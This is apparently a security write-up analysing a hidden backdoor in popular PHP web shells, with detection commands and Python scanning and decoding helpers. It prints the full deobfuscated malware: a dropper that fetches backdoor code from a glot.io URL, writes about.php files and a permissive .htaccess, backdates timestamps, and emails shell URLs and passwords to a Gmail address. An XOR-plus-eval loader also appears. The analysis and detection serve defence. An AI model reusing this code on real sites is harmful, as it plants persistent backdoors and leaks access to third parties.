Popular Web Shell Variants Contain a Hidden Backdoor
Web Shell Stealer = Hidden Backdoor
A web shell stealer works by secretly informing someone whenever the web shell is uploaded to a website. Sometimes the creator will also secretly add additional PHP backdoor files.
How It Works
There are two main actions performed by the hidden backdoor code:
Backdoor Dropper
The first half of the hidden backdoor silently creates additional PHP backdoors named about.php and about.PHP in existing directories randomly selected from the website's document root, along with an .htaccess that allows those .php files to be served. touch() is then used to set the modify (mtime) timestamp of each dropped file to a random date within a defined range (2015 to 2018 in the sample), which helps to evade detection.
```php
global $root,$http,$host,$domain,$ht,$gojj;
fi1($root);
$fp2 = @fp2($root);
$count = count($fp2);
$xiadan_url="\n";
for($i=0;$i<1;$i++){
list($msec, $sec) = explode(' ', microtime());
$rand = $msec*100000000;
$fp_ran = $fp2[$rand%$count];
$randnum = rand_abc(mt_rand(1, 15));
$dirpath = dir_path($fp_ran);
$fp2_arr = explode("/",$dirpath);
$z1 = @empty($fp2)?$root."/".$randnum:$fp_ran;
$z3=$z1."/about.php";
$za=$z1."/about.PHP";
$z4=str_replace($root."/", "", $z3);
$z551=str_replace($root."/", "", $za);
if($i == 0){
$z22 = get("https://glot.io/snippets/g8ofh3h3db/raw/alfapas.php");
$xd_ok = @fwrite(fopen($z3, "w"), $z22)?"1":"0";
$xd_ok = @fwrite(fopen($za, "w"), $z22)?"1":"0";
}elseif($i == 1){
$z23 = get("https://glot.io/snippets/g8ofh3h3db/raw/alfapas.php");
$xd_ok = @fwrite(fopen($za, "w"), $z23)?"1":"0";
}elseif($i == 2){
$z24 = get("https://glot.io/snippets/g8ofh3h3db/raw/alfapas.php");
$xd_ok = @fwrite(fopen($z3, "w"), $z24)?"1":"0";
}elseif($i == 3){
$z25 = get("https://glot.io/snippets/g8ofh3h3db/raw/alfapas.php");
$xd_ok = @fwrite(fopen($z3, "w"), $z25)?"1":"0";
}else{
$z23 = get("https://glot.io/snippets/g8ofh3h3db/raw/alfapas.php");
$xd_ok = @fwrite(fopen($z3, "w"), $z23)?"1":"0";
}
touch($z3, strtotime(rand(2015, 2018)."-".rand(3, 12)."-".rand(1, 30)." ".date("H:i:s")));
touch($za, strtotime(rand(2015, 2018)."-".rand(3, 12)."-".rand(1, 30)." ".date("H:i:s")));
$ht = $z1."/.htaccess";
@chmod($ht, 0755);@unlink($ht);@fwrite(fopen($ht,"w"),base64_decode("PEZpbGVzTWF0Y2ggIi4qXC4oP2k6cGh0bWx8cGhwfFBIUCkkIj4KT3JkZXIgQWxsb3csRGVueQpBbGxvdyBmcm9tIGFsbAo8L0ZpbGVzTWF0Y2g+"));
touch($ht, strtotime(rand(2015, 2018)."-".rand(3, 12)."-".rand(1, 30)." ".date("H:i:s")));
$xd_url = $http."://".$host."/";
$xiadan_url .= $xd_url.$z4."\t".$xd_url.$z551."\t";
```
The spoofed modify (mtime) timestamps hide the backdoors from a listing sorted by date, because ls shows the mtime. Searching on the ctime instead finds them, since touch() cannot backdate the change time:
```
# find . -type f -ctime -1 -ls
27406936 4 -rw-r--r-- 1 www-data www-data 84 May 3 2017 ./magento2/vendor/magento/framework/Encryption/Test/Unit/Helper/.htaccess
27406934 368 -rw-r--r-- 1 www-data www-data 375310 Jun 14 2017 ./magento2/vendor/magento/framework/Encryption/Test/Unit/Helper/about.php
27406935 368 -rw-r--r-- 1 www-data www-data 375310 Jun 12 2016 ./magento2/vendor/magento/framework/Encryption/Test/Unit/Helper/about.PHP
27406933 4 -rw-r--r-- 1 www-data www-data 84 Mar 11 2016 ./magento2/vendor/magento/framework/Acl/Test/Unit/.htaccess
27406931 368 -rw-r--r-- 1 www-data www-data 375310 Mar 30 2016 ./magento2/vendor/magento/framework/Acl/Test/Unit/about.php
27406932 368 -rw-r--r-- 1 www-data www-data 375310 Nov 11 2015 ./magento2/vendor/magento/framework/Acl/Test/Unit/about.PHP
791089 4 -rw-r--r-- 1 www-data www-data 84 Jul 13 2018 ./magento2/vendor/magento/module-login-as-customer-log/Ui/.htaccess
786501 368 -rw-r--r-- 1 www-data www-data 375310 Aug 13 2015 ./magento2/vendor/magento/module-login-as-customer-log/Ui/about.php
791087 368 -rw-r--r-- 1 www-data www-data 375310 Jun 23 2017 ./magento2/vendor/magento/module-login-as-customer-log/Ui/about.PHP
18354949 4 -rw-r--r-- 1 www-data www-data 84 Sep 21 2016 ./wordpress-bkup/wp-content/plugins/better-wp-security/core/modules/admin-user/.htaccess
18354945 368 -rw-r--r-- 1 www-data www-data 375310 Jun 26 2015 ./wordpress-bkup/wp-content/plugins/better-wp-security/core/modules/admin-user/about.php
18354948 368 -rw-r--r-- 1 www-data www-data 375310 Dec 25 2017 ./wordpress-bkup/wp-content/plugins/better-wp-security/core/modules/admin-user/about.PHP
22948668 4 -rw-r--r-- 1 www-data www-data 84 Oct 15 2015 ./prestashop/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Session/.htaccess
22948666 368 -rw-r--r-- 1 www-data www-data 375310 Sep 15 2016 ./prestashop/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Session/about.php
22948667 368 -rw-r--r-- 1 www-data www-data 375310 Aug 11 2018 ./prestashop/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Session/about.PHP

# stat ./magento2/vendor/magento/framework/Encryption/Test/Unit/Helper/about.php
File: ./magento2/vendor/magento/framework/Encryption/Test/Unit/Helper/about.php
Size: 375310 Blocks: 736 IO Block: 4096 regular file
Device: fe01h/65025d Inode: 27406934 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 33/www-data) Gid: ( 33/www-data)
Access: 2017-06-14 15:10:41.000000000 -0500
Modify: 2017-06-14 15:10:41.000000000 -0500
Change: 2022-05-22 15:10:41.280727261 -0500
Birth: 2022-05-22 15:10:41.276727262 -0500
```
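As an added example (not from the original post), a small Python scanner for the dropper's footprint on disk: the about.php/about.PHP names, the 84-byte .htaccess decoded from the base64 blob in the sample above, and the ctime/mtime gap that a backdated touch() leaves behind. The skew threshold and the command-line usage are assumptions.

```python
import base64
import os
import stat
import sys

# The .htaccess the dropper writes, decoded from the base64 blob in the sample above.
DROPPER_HTACCESS = base64.b64decode(
    "PEZpbGVzTWF0Y2ggIi4qXC4oP2k6cGh0bWx8cGhwfFBIUCkkIj4KT3JkZXIgQWxsb3csRGVueQpBbGxvdyBmcm9tIGFsbAo8L0ZpbGVzTWF0Y2g+"
)
DROPPED_NAMES = {"about.php", "about.PHP"}
# Assumed threshold: touch() backdates mtime by years, but the kernel sets ctime to "now".
SKEW_SECONDS = 24 * 3600


def is_dropper_htaccess(path):
    """True if the file is byte-for-byte the 84-byte .htaccess the dropper writes."""
    with open(path, "rb") as fh:
        return fh.read(len(DROPPER_HTACCESS) + 1) == DROPPER_HTACCESS


def scan(docroot, skew=SKEW_SECONDS):
    """Walk docroot and return (path, reason) pairs for files matching the dropper's footprint."""
    hits = []
    for dirpath, _dirs, files in os.walk(docroot):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            if name in DROPPED_NAMES:
                hits.append((path, "dropper file name"))
            elif name == ".htaccess" and is_dropper_htaccess(path):
                hits.append((path, "dropper .htaccess content"))
            # A spoofed mtime shows up as a change time far newer than the modify time.
            gap = int(st.st_ctime - st.st_mtime)
            if gap > skew:
                hits.append((path, "ctime newer than mtime by %d s" % gap))
    return hits


if __name__ == "__main__":
    for path, reason in scan(sys.argv[1] if len(sys.argv) > 1 else "."):
        print("%-40s %s" % (reason, path))
```

Run it against the document root; a file that hits both the name rule and the skew rule is listed twice, once per reason.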
Email Beacon
The second half of the hidden backdoor code silently sends an email notification to the operator whenever someone loads the PHP web shell; that same page load is what triggers the PHP backdoor dropper function described above.
We can see the outgoing emails queued for processing by the exim MTA (the MTA used on this server):
```
# exim -bp | tail -n 15
0m 656 1nsruQ-004vZc-Db <www-data@localhost.localdomain>
loggershell443@gmail.com
0m 684 1nsruT-004vZz-AN <www-data@localhost.localdomain>
loggershell443@gmail.com
0m 714 1nsruT-004va1-Af <www-data@localhost.localdomain>
loggershell443@gmail.com
0m 716 1nsruT-004vaA-Ng <www-data@localhost.localdomain>
loggershell443@gmail.com
0m 672 1nsruT-004vaD-SW <www-data@localhost.localdomain>
loggershell443@gmail.com
```
And here’s a sample of the body of the email:
```
# exim -Mvb 1nsruT-004vaD-SW
1nsruT-004vaD-SW-D
[ 127.0.0.1 ]
Logged Shell http://localhost/alfanew-decoded.php Yanz Password () SpawnedShell
http://localhost/magento2/vendor/magento/module-login-as-customer-log/Ui/about.php http://localhost/magento2/vendor/magento/module-login-as-customer-log/Ui/about.PHP *IP Address : [ 127.0.0.1 ]
```
Why Is It Used?
If other attackers unknowingly give you access to the websites they compromised, then you effectively have other people hacking websites for you.
The main problem is that once someone realizes your PHP web shell contains a hidden backdoor, you will be put on blast and any reputation associated with your alias will be ruined.
Sample
A sample of the hidden backdoor code that was injected into common PHP web shells is included below, first in its original XOR-encrypted form and then as the decoded/deobfuscated plaintext.
```php
// Repeating-key XOR. For inputs no longer than the key, PHP's string ^ operator
// performs the same byte-wise XOR, truncated to the length of the input.
function b($input, $key) {
$inputLen = strlen($input);
$keyLen = strlen($key);
if ($inputLen <= $keyLen) {
return $input ^ $key;
}
for ($i = 0; $i < $inputLen; ++$i) {
$input[$i] = $input[$i] ^ $key[$i % $keyLen];
}
return $input;
}
$key = "lovevenda";
$data = "..."; // base64-encoded, XOR-encrypted payload (omitted here)
$decoded = b(base64_decode($data),$key);
eval ($decoded);
```
Decoded/deobfuscated plaintext:
```php
<?php
$root=$_SERVER['DOCUMENT_ROOT'];@chdir($root);
$http=(isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on") ? 'https' : 'http';
$host = $_SERVER["HTTP_HOST"];
global $root,$http,$host,$domain,$ht,$gojj;
// if(file_exists("wp-config.php")){
// adduser();
// }
fi1($root);
$fp2 = @fp2($root);
$count = count($fp2);
$xiadan_url="\n";
for($i=0;$i<1;$i++){
list($msec, $sec) = explode(' ', microtime());
$rand = $msec*100000000;
$fp_ran = $fp2[$rand%$count];
$randnum = rand_abc(mt_rand(1, 15));
$dirpath = dir_path($fp_ran);
$fp2_arr = explode("/",$dirpath);
$z1 = @empty($fp2)?$root."/".$randnum:$fp_ran;
$z3=$z1."/about.php";
$za=$z1."/about.PHP";
$z4=str_replace($root."/", "", $z3);
$z551=str_replace($root."/", "", $za);
if($i == 0){
$z22 = get("https://glot.io/snippets/g8ofh3h3db/raw/alfapas.php");
$xd_ok = @fwrite(fopen($z3, "w"), $z22)?"1":"0";
$xd_ok = @fwrite(fopen($za, "w"), $z22)?"1":"0";
}elseif($i == 1){
$z23 = get("https://glot.io/snippets/g8ofh3h3db/raw/alfapas.php");
$xd_ok = @fwrite(fopen($za, "w"), $z23)?"1":"0";
}elseif($i == 2){
$z24 = get("https://glot.io/snippets/g8ofh3h3db/raw/alfapas.php");
$xd_ok = @fwrite(fopen($z3, "w"), $z24)?"1":"0";
}elseif($i == 3){
$z25 = get("https://glot.io/snippets/g8ofh3h3db/raw/alfapas.php");
$xd_ok = @fwrite(fopen($z3, "w"), $z25)?"1":"0";
}else{
$z23 = get("https://glot.io/snippets/g8ofh3h3db/raw/alfapas.php");
$xd_ok = @fwrite(fopen($z3, "w"), $z23)?"1":"0";
}
touch($z3, strtotime(rand(2015, 2018)."-".rand(3, 12)."-".rand(1, 30)." ".date("H:i:s")));
touch($za, strtotime(rand(2015, 2018)."-".rand(3, 12)."-".rand(1, 30)." ".date("H:i:s")));
$ht = $z1."/.htaccess";
@chmod($ht, 0755);@unlink($ht);@fwrite(fopen($ht,"w"),base64_decode("PEZpbGVzTWF0Y2ggIi4qXC4oP2k6cGh0bWx8cGhwfFBIUCkkIj4KT3JkZXIgQWxsb3csRGVueQpBbGxvdyBmcm9tIGFsbAo8L0ZpbGVzTWF0Y2g+"));
touch($ht, strtotime(rand(2015, 2018)."-".rand(3, 12)."-".rand(1, 30)." ".date("H:i:s")));
$xd_url = $http."://".$host."/";
$xiadan_url .= $xd_url.$z4."\t".$xd_url.$z551."\t";
}
function fi1($path){
$arpath8 = array();
global $arpath8;
if ($handle = opendir($path)) {
while (($file = readdir($handle)) !== false) {
if ($file != "." && $file != ".." && $file != 'root' && !strstr($file, "upload") && !strstr($file, "ALFA_DATA") && !strstr($file, "Fox") && !strstr($file, "php") && strlen($file)<30 && !strstr($file, ".") && !strstr($file, "well-known")) {
if (is_dir($path."/".$file) && !is_link($path.'/'.$file)) {
if(!file_exists($path."/".$file."/about.php")){
$arpath8[] = $path."/".$file;
}
fi1($path."/".$file);
}
}
}
}
}
function fp2($root){
global $root;
$p_arr = array();
$pnew_arr = array();
global $arpath8;
foreach ($arpath8 as $k => $v) {
$qupath = str_replace($root, "", $v);
$p_arr[$k] = explode("/", $qupath);
if (count($p_arr[$k])>=3) {
$pnew_arr[] = $v;
}
}
return $pnew_arr;
}
function rand_abc($length){
$str = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
$strlen = 52;
while ($length > $strlen) {
$str .= $str;
$strlen += 52;
}
$str = str_shuffle($str);
return substr($str, 0, $length);
}
function dir_path($path){
$path = str_replace(chr(92).chr(92), "/", $path);
if (substr($path, -1) != "/") $path = $path;
return $path;
}
function get($url){
$contents = @file_get_contents($url);
if (!$contents) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$contents = curl_exec($ch);
curl_close($ch);
}
return $contents;
}
$tujuanmail = 'loggershell443@gmail.com';
$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$simememememekekkk1 = $simememememekekkk;
$pesan_alert = "Logged Shell $x_path Yanz Password ($simememememekekkk1) SpawnedShell $xiadan_url *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
$pattern = "/(alfanew.php|alfanew1.PHP|alfa-rex.php|alfa-ioxi.php|alfaxor.php|alfanewl.php|alfanewl1.PHP|alfa-ioxi1.PHP)/";
if (preg_match($pattern, $x_path)){
mail($tujuanmail, "Logged Shell Lokal", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
}else{
mail($tujuanmail, "Logged Shell Yanz", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
};
?>
```
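As an added example (not part of the original post), a Python reimplementation of the loader's b() routine that an analyst can point at a loader of this shape to recover the plaintext without ever executing it. The key is the one hard-coded in the sample above; because the page omits the real base64 blob, the block builds a constructed stand-in packed the same way, and the regex-based $key/$data extraction is an assumption about how such loaders are laid out.

```python
import base64
import re

KEY = b"lovevenda"  # the key hard-coded in the loader above


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """Byte-wise XOR with the key repeated, the same operation as the loader's b().
    PHP's string ^ truncates to the shorter operand, so b()'s short-input branch
    is this same operation restricted to len(data)."""
    return bytes(c ^ key[i % len(key)] for i, c in enumerate(data))


def extract_from_loader(src: str):
    """Pull the $key and base64 $data literals out of loader source of this shape."""
    key = re.search(r'\$key\s*=\s*"([^"]*)"', src)
    data = re.search(r'\$data\s*=\s*"([A-Za-z0-9+/=]*)"', src)
    if not key or not data:
        raise ValueError("loader does not use the $key/$data pattern")
    return key.group(1).encode(), data.group(1)


def decode_loader_payload(b64_blob: str, key: bytes = KEY) -> bytes:
    """What eval() would have received: base64-decode, then XOR with the key."""
    return xor_repeating(base64.b64decode(b64_blob), key)


def looks_like_php(payload: bytes) -> bool:
    """Cheap check that the key was right: the decoded dropper starts with <?php."""
    return payload.lstrip().startswith(b"<?php")


# Constructed stand-in for the blob omitted from the page: a tiny plaintext packed the same way.
SAMPLE_PLAINTEXT = b"<?php echo 'constructed sample'; ?>"
SAMPLE_LOADER = (
    'function b($input, $key) { /* as above */ }\n'
    '$key = "lovevenda";\n'
    '$data = "%s";\n'
    '$decoded = b(base64_decode($data),$key);\n'
    'eval ($decoded);\n'
) % base64.b64encode(xor_repeating(SAMPLE_PLAINTEXT, KEY)).decode()

if __name__ == "__main__":
    key, blob = extract_from_loader(SAMPLE_LOADER)
    print(decode_loader_payload(blob, key).decode())
```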